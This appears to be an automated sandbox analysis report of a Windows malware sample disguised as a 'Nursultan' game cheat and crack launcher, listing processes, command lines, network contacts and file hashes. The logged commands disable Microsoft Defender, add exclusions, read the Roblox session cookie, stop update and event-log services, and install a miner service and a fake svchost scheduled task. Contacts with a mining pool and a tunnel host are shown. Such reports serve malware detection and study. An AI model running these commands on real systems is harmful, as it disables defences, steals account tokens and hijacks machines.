PID 2128 wrote to memory of 3076 N/A C:\Users\Admin\AppData\Local\Temp\87fdd3337325634e35611a0cf9a9a4de31d4630dada6eeea83f261be5fbcaa95.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2128 wrote to memory of 4244 N/A C:\Users\Admin\AppData\Local\Temp\87fdd3337325634e35611a0cf9a9a4de31d4630dada6eeea83f261be5fbcaa95.exe C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
PID 2128 wrote to memory of 4244 N/A C:\Users\Admin\AppData\Local\Temp\87fdd3337325634e35611a0cf9a9a4de31d4630dada6eeea83f261be5fbcaa95.exe C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
PID 2128 wrote to memory of 4244 N/A C:\Users\Admin\AppData\Local\Temp\87fdd3337325634e35611a0cf9a9a4de31d4630dada6eeea83f261be5fbcaa95.exe C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
PID 2128 wrote to memory of 1888 N/A C:\Users\Admin\AppData\Local\Temp\87fdd3337325634e35611a0cf9a9a4de31d4630dada6eeea83f261be5fbcaa95.exe C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
PID 2128 wrote to memory of 1888 N/A C:\Users\Admin\AppData\Local\Temp\87fdd3337325634e35611a0cf9a9a4de31d4630dada6eeea83f261be5fbcaa95.exe C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
PID 4584 wrote to memory of 3456 N/A C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe C:\Windows\SYSTEM32\attrib.exe
PID 4584 wrote to memory of 3456 N/A C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe C:\Windows\SYSTEM32\attrib.exe
PID 1888 wrote to memory of 4008 N/A C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe C:\Windows\system32\cmd.exe
PID 1888 wrote to memory of 4008 N/A C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe C:\Windows\system32\cmd.exe
PID 4584 wrote to memory of 3976 N/A C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4584 wrote to memory of 3976 N/A C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4584 wrote to memory of 4928 N/A C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4584 wrote to memory of 4928 N/A C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4584 wrote to memory of 4604 N/A C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4584 wrote to memory of 4604 N/A C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\87fdd3337325634e35611a0cf9a9a4de31d4630dada6eeea83f261be5fbcaa95.exe

"C:\Users\Admin\AppData\Local\Temp\87fdd3337325634e35611a0cf9a9a4de31d4630dada6eeea83f261be5fbcaa95.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'

C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'

C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"

C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe

"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"

C:\Windows\SYSTEM32\attrib.exe

"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c cls

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" os get Caption

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" computersystem get totalphysicalmemory

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Windows\System32\Wbem\wmic.exe

"wmic" path win32_VideoController get name

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe'

C:\Windows\SYSTEM32\cmd.exe

"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe" && pause

C:\Windows\system32\PING.EXE

ping localhost

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop UsoSvc

C:\Windows\system32\wusa.exe

wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop WaaSMedicSvc

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop wuauserv

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop bits

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop dosvc

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe delete "XMRKNZQC"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe create "XMRKNZQC" binpath= "C:\ProgramData\scppqqgespxv\jqvljmboayxs.exe" start= "auto"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop eventlog

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe start "XMRKNZQC"

C:\ProgramData\scppqqgespxv\jqvljmboayxs.exe

C:\ProgramData\scppqqgespxv\jqvljmboayxs.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop UsoSvc

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop WaaSMedicSvc

C:\Windows\system32\wusa.exe

wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop wuauserv

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop bits

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop dosvc

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0

C:\Windows\system32\conhost.exe

C:\Windows\system32\conhost.exe

C:\Windows\system32\svchost.exe

svchost.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'MSBuild.exe'

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\svchost.exe'

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\svchost.exe"

C:\Users\Admin\AppData\Roaming\svchost.exe

C:\Users\Admin\AppData\Roaming\svchost.exe

C:\Users\Admin\AppData\Roaming\svchost.exe

C:\Users\Admin\AppData\Roaming\svchost.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 13.107.21.237:443 g.bing.com tcp
NL 23.62.61.194:443 www.bing.com tcp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 237.21.107.13.in-addr.arpa udp
US 8.8.8.8:53 194.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 73.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp
US 8.8.8.8:53 183.142.211.20.in-addr.arpa udp
US 8.8.8.8:53 gstatic.com udp
GB 172.217.16.227:443 gstatic.com tcp
US 8.8.8.8:53 227.16.217.172.in-addr.arpa udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 discord.com udp
US 162.159.135.232:443 discord.com tcp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 232.135.159.162.in-addr.arpa udp
US 8.8.8.8:53 mine.bmpool.org udp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 30.178.252.5.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
RO 5.252.178.30:6004 mine.bmpool.org tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 unknown-sunglasses.gl.at.ply.gg udp
US 147.185.221.20:28223 unknown-sunglasses.gl.at.ply.gg tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
RO 5.252.178.30:6004 mine.bmpool.org tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 147.185.221.20:28223 unknown-sunglasses.gl.at.ply.gg tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 10.28.171.150.in-addr.arpa udp
RO 5.252.178.30:6004 mine.bmpool.org tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 147.185.221.20:28223 unknown-sunglasses.gl.at.ply.gg tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 6.173.189.20.in-addr.arpa udp

Files

memory/2128-0-0x00007FF8AFBD3000-0x00007FF8AFBD5000-memory.dmp

memory/2128-1-0x0000000000480000-0x0000000000780000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_s1mrhdqp.xif.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/464-11-0x0000022CEAD90000-0x0000022CEADB2000-memory.dmp

memory/464-12-0x00007FF8AFBD0000-0x00007FF8B0691000-memory.dmp

memory/464-13-0x00007FF8AFBD0000-0x00007FF8B0691000-memory.dmp

memory/464-14-0x00007FF8AFBD0000-0x00007FF8B0691000-memory.dmp

memory/464-17-0x00007FF8AFBD0000-0x00007FF8B0691000-memory.dmp

memory/2128-18-0x00007FF8AFBD0000-0x00007FF8B0691000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe

MD5 a1d8db2a1ff742bc73dd5617083f5fde
SHA1 957b182d82efb40a36099dd886ad581977880838
SHA256 d715e599815190df86069fae7220db64b5999207f77fb6e41cfe318d34c7399a
SHA512 0c5407f5707e5f2808cf1d85d71815ca67d45edc8bd8a83cc424dc927afcbad6ced5a826fff81549e5684ca0ece039513c3351ce7bf231e37885f7ed04dc513f

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 d85ba6ff808d9e5444a4b369f5bc2730
SHA1 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 2e907f77659a6601fcc408274894da2e
SHA1 9f5b72abef1cd7145bf37547cdb1b9254b4efe9d
SHA256 385da35673330e21ac02545220552fe301fe54dedefbdafc097ac4342a295233
SHA512 34fa0fff24f6550f55f828541aaefe5d75c86f8f0842d54b50065e9746f9662bb7209c74c9a9571540b9855bb3851f01db613190024e89b198d485bb5dc07721

C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe

MD5 f0b33cc162bfd36a995b8c90cd8ebff1
SHA1 ca1ddef08d47fc15a44a2d651b61e3decce8ebc6
SHA256 6363305dc75b8bf7aa2a8b31b0b0f38022fb0139f809ecba42e5cfe7530830e0
SHA512 1426cd246662adfd9aba4434586dc3bd54d31d395d9fafdcb15e785461a466567bff62e85085c36043cca047f951a96e5fc359c5cbf1000ff3121bba6b2905d0

memory/4584-50-0x000001A8B4AC0000-0x000001A8B4B00000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 fa8d1461e4feb2c39654e3a555a027f8
SHA1 0ca46b8961ceba8f9da31de5ed2408643fc89141
SHA256 7e26e4f0ef3a7d2904818a691429789c4781029ff4aab697c3b7c9a4287d661f
SHA512 e486b8f029c7eec60b6b2b5603390330afb1ddf627cc01c511808c47e68676b4c429b9f75fd4e16e48b496dccfe8cc8ec4a35825e1e889e66571acb6c03e0869

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe

MD5 0df0a039309525fd27e1b5e056c92b6a
SHA1 7551c27a9123cb56c4218647966a753794ac2961
SHA256 a29379238f93fa6301dd390e635b0c1f53d9197c68adc0f00cbc52bb4311a23f
SHA512 2c00ea216368e254167bd5f2562cbc93953b9c4756765f4504aaae7e9dc45e5584fef1ddb174b651a9a090c7217424e5b80dec58f6f2493c54704f46c35fede6

C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe

MD5 c137c5f5287d73a94d55bc18df238303
SHA1 95b4b01775bea14feaaa462c98d969eb81696d2c
SHA256 d294856177658df0159cfe937e5ea95a8ee8a2ca85754d897aea3bb5d0d962c0
SHA512 ba595d185ae98152658ce95964fd6bcce7e970896b0b1c674a142d126cf0433094debcd25527d9b4f5a6568cc5a8a42aeaef536166748eea3973f8b694564aa5

memory/2128-82-0x00007FF8AFBD0000-0x00007FF8B0691000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 ef72c47dbfaae0b9b0d09f22ad4afe20
SHA1 5357f66ba69b89440b99d4273b74221670129338
SHA256 692ec20c7039170fb199510f0436181fd155e6b4516d4d1c9e1675adf99aaa7f
SHA512 7514b6bc8dc39fa618223300be27cd535dc35b18c66b4a089e2302e72b3e0cac06d88a989fa1296feb386b3cbe2084019df6430c7f895071b76e04ce559a30b4

memory/4244-94-0x0000000000940000-0x0000000000B28000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 65a68df1062af34622552c4f644a5708
SHA1 6f6ecf7b4b635abb0b132d95dac2759dc14b50af
SHA256 718dc2f5f4a6dbb7fab7f3db05bd7f602fb16526caae7084ab46c3ab4e7bad35
SHA512 4e460eb566032942547b58411222dd26ae300a95f83cf5ae6df58ebd28594341123611b348bd4031a33bc7f38307d5cb8fb677bba8c896919e3eee677a104d4d

memory/4584-108-0x000001A8CF230000-0x000001A8CF2A6000-memory.dmp

memory/4584-109-0x000001A8CF2B0000-0x000001A8CF300000-memory.dmp

memory/4584-110-0x000001A8B6750000-0x000001A8B676E000-memory.dmp

memory/4244-111-0x00000000054D0000-0x000000000556C000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 07d142044fb78e359c794180a9c6fdff
SHA1 8a7155f93a53ff1b7f382a4ccb3f58ff2f88808e
SHA256 2af8c3ca529953085ca25f69d9142964e2ce5508665c14f3533a47d254fed3ea
SHA512 356edd3598c09b765c3de325bc47c5c8ae7fcfd87e8c58e12e8bb6437f1d7ce58310e06c4d64336815833e280f2e61c288edb09508c4f29876d28b0d602aeb78

memory/4244-135-0x00000000061C0000-0x0000000006764000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 88be3bc8a7f90e3953298c0fdbec4d72
SHA1 f4969784ad421cc80ef45608727aacd0f6bf2e4b
SHA256 533c8470b41084e40c5660569ebbdb7496520d449629a235e8053e84025f348a
SHA512 4fce64e2dacddbc03314048fef1ce356ee2647c14733da121c23c65507eeb8d721d6b690ad5463319b364dc4fa95904ad6ab096907f32918e3406ef438a6ef7c

memory/4244-147-0x0000000005C90000-0x0000000005D46000-memory.dmp

memory/1248-148-0x0000000000400000-0x0000000000412000-memory.dmp

memory/4584-153-0x000001A8B6790000-0x000001A8B679A000-memory.dmp

memory/4584-154-0x000001A8B67C0000-0x000001A8B67D2000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 75f5f6d1505c3d09f147fec53238c2c0
SHA1 508feb25bce53e5e3ac0b4ed70c1992e329bf07b
SHA256 464fbbbdf5db7ad5b4341e6f1fd33d4db12534e3df2769fc5efc51b4e0b47b33
SHA512 f5cc3a6b86c22994b5e7e01803e037b1ed4c7b48698b6b29087b5e5042c9cdb3697c3dc58e261f7bd9200b0133da7601aee21643b09a152553c1d05c51424461

memory/3616-170-0x0000000004E20000-0x0000000004E56000-memory.dmp

memory/3616-171-0x00000000054C0000-0x0000000005AE8000-memory.dmp

memory/3616-176-0x0000000005410000-0x0000000005432000-memory.dmp

memory/3616-177-0x0000000005BF0000-0x0000000005C56000-memory.dmp

memory/3616-178-0x0000000005D50000-0x0000000005DB6000-memory.dmp

memory/3616-188-0x0000000005EC0000-0x0000000006214000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 894afb4ff3cd7ee1f69400e936f8fc9d
SHA1 aa0eb6ac58f8997940c1aa2e6f6c42d7c3837e51
SHA256 20948b37924c58362ffc5d1472667b53c6d7fc865ad541c901cebf41d04a03c9
SHA512 449494468d267f9689a277ce858dac7dfda04ceb568f60170645582fd631901a9ef780da8e420cba8a297edc11cd63a874e3429b95cf90e7261d2b9ab8850e98

memory/3616-200-0x0000000006410000-0x000000000645C000-memory.dmp

memory/3616-199-0x00000000063C0000-0x00000000063DE000-memory.dmp

memory/3616-215-0x0000000070890000-0x00000000708DC000-memory.dmp

memory/3616-214-0x0000000006980000-0x00000000069B2000-memory.dmp

memory/3616-225-0x00000000069C0000-0x00000000069DE000-memory.dmp

memory/3616-226-0x00000000075F0000-0x0000000007693000-memory.dmp

memory/2944-236-0x00000196FE090000-0x00000196FE0AC000-memory.dmp

memory/2944-237-0x00000196FE0B0000-0x00000196FE165000-memory.dmp

memory/3616-238-0x0000000007D30000-0x00000000083AA000-memory.dmp

memory/2944-239-0x00000196FE080000-0x00000196FE08A000-memory.dmp

memory/3616-240-0x00000000076F0000-0x000000000770A000-memory.dmp

memory/3616-241-0x0000000007760000-0x000000000776A000-memory.dmp

memory/2944-242-0x00000196FE2D0000-0x00000196FE2EC000-memory.dmp

memory/3616-243-0x0000000007960000-0x00000000079F6000-memory.dmp

memory/3616-244-0x0000000007920000-0x0000000007931000-memory.dmp

memory/2944-245-0x00000196FE2B0000-0x00000196FE2BA000-memory.dmp

memory/2944-246-0x00000196FE310000-0x00000196FE32A000-memory.dmp

memory/2944-247-0x00000196FE2C0000-0x00000196FE2C8000-memory.dmp

memory/2944-248-0x00000196FE2F0000-0x00000196FE2F6000-memory.dmp

memory/2944-249-0x00000196FE300000-0x00000196FE30A000-memory.dmp

memory/3616-252-0x0000000007940000-0x000000000794E000-memory.dmp

memory/3616-253-0x0000000007A00000-0x0000000007A14000-memory.dmp

memory/3616-254-0x0000000007A50000-0x0000000007A6A000-memory.dmp

memory/4600-259-0x0000000140000000-0x000000014000E000-memory.dmp

memory/4600-258-0x0000000140000000-0x000000014000E000-memory.dmp

memory/812-264-0x0000000140000000-0x0000000140848000-memory.dmp

memory/812-268-0x0000000140000000-0x0000000140848000-memory.dmp

memory/812-270-0x000001B194D50000-0x000001B194D70000-memory.dmp

memory/812-272-0x0000000140000000-0x0000000140848000-memory.dmp

memory/3616-271-0x0000000007A30000-0x0000000007A38000-memory.dmp

memory/812-273-0x0000000140000000-0x0000000140848000-memory.dmp

memory/812-276-0x0000000140000000-0x0000000140848000-memory.dmp

memory/812-275-0x0000000140000000-0x0000000140848000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 b1964f71ab2b69655a2994782b875132
SHA1 0e548645cab1dda0c3d5d528393a08ce0b6fe6a5
SHA256 b9cef8300f65c804798ca1f4437408825d29f80429412a5bb8664284953b18f4
SHA512 54b47140ef4cf71f850e0852c66f01960c312f5c2bb476550d18bb1f5a3640f6eeb12b867d4057cd3d7c353820af2815fea5bb999cfcf6ca81d6e4882efbbf1f

memory/812-274-0x0000000140000000-0x0000000140848000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 968cb9309758126772781b83adb8a28f
SHA1 8da30e71accf186b2ba11da1797cf67f8f78b47c
SHA256 92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
SHA512 4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

memory/812-269-0x0000000140000000-0x0000000140848000-memory.dmp

memory/812-267-0x0000000140000000-0x0000000140848000-memory.dmp

memory/812-266-0x0000000140000000-0x0000000140848000-memory.dmp

memory/812-265-0x0000000140000000-0x0000000140848000-memory.dmp

memory/812-263-0x0000000140000000-0x0000000140848000-memory.dmp

memory/4600-257-0x0000000140000000-0x000000014000E000-memory.dmp

memory/4600-256-0x0000000140000000-0x000000014000E000-memory.dmp

memory/4600-255-0x0000000140000000-0x000000014000E000-memory.dmp

memory/4600-262-0x0000000140000000-0x000000014000E000-memory.dmp

memory/4964-283-0x00000000060F0000-0x0000000006444000-memory.dmp

memory/4964-292-0x0000000070890000-0x00000000708DC000-memory.dmp

memory/4816-308-0x0000000005E50000-0x00000000061A4000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 aaf7b04e5be4bb88401156f4d8f34761
SHA1 f75e2c47377abdf27b1e2c4e73e69c5bff3e5171
SHA256 bf36186c9d6f77f6c8e2a728acea18d88c3e57de96724f4da7bca1c3068286a1
SHA512 3ca79af34fbd2b1167dce18e33ccb0c16f40f9306c27242ac878c60892ef2c01f2b6af4e01d3f0c251a54ab27b4228eab0bed0927a5fa0f8c09efb431c58ad56

memory/4816-314-0x0000000070890000-0x00000000708DC000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 bcb4bbb1531c93c8bb72dfe947c111a7
SHA1 8dd388d15f8d0f39de79a248682b67a0617ea069
SHA256 0eab3d15bc1e82c559b068f396928633378e07dc299fbd8d54e6517e615131d0
SHA512 8a9964419f1aea9a06c692619c545089394407b0ca742611e1389051f69a2f432294e032ae8c53a5282b69f7dfbfe251fb8634f2898b5615c2dee741187a5f89

memory/1976-335-0x0000000070890000-0x00000000708DC000-memory.dmp

memory/1248-350-0x0000000006A60000-0x0000000006AF2000-memory.dmp

memory/1248-351-0x0000000006460000-0x000000000646A000-memory.dmp

C:\Users\Admin\AppData\Roaming\svchost.exe

MD5 8fdf47e0ff70c40ed3a17014aeea4232
SHA1 e6256a0159688f0560b015da4d967f41cbf8c9bd
SHA256 ed9884bac608c06b7057037cc91d90e4ae5f74dd2dbce2af476699c6d4492d82
SHA512 bd69d092ed4f9c5e1f24eaf5ec79fb316469d53849dc798fae0fcba5e90869b77ee924c23cc6f692198ff25827ab60ad47bb46cadd6e0aadde7731cbafb013be

memory/2972-354-0x00000000005D0000-0x0000000000610000-memory.dmp

memory/2972-355-0x00000000052E0000-0x00000000052FA000-memory.dmp

memory/2972-356-0x0000000005760000-0x00000000058BA000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\svchost.exe.log

MD5 0efd0cfcc86075d96e951890baf0fa87
SHA1 6e98c66d43aa3f01b2395048e754d69b7386b511
SHA256 ff981780f37479af6a428dd121eef68cf6e0b471ae92f080893a55320cc993f7
SHA512 4e79f5a8494aac94f98af8dbbc71bdd0a57b02103757ad970da7e7d4e6a0dc5015ca008256a6bd2c5bdec3a0f5736a994e17b3ef004b0f374a3339e480ac41b1

memory/812-361-0x0000000140000000-0x0000000140848000-memory.dmp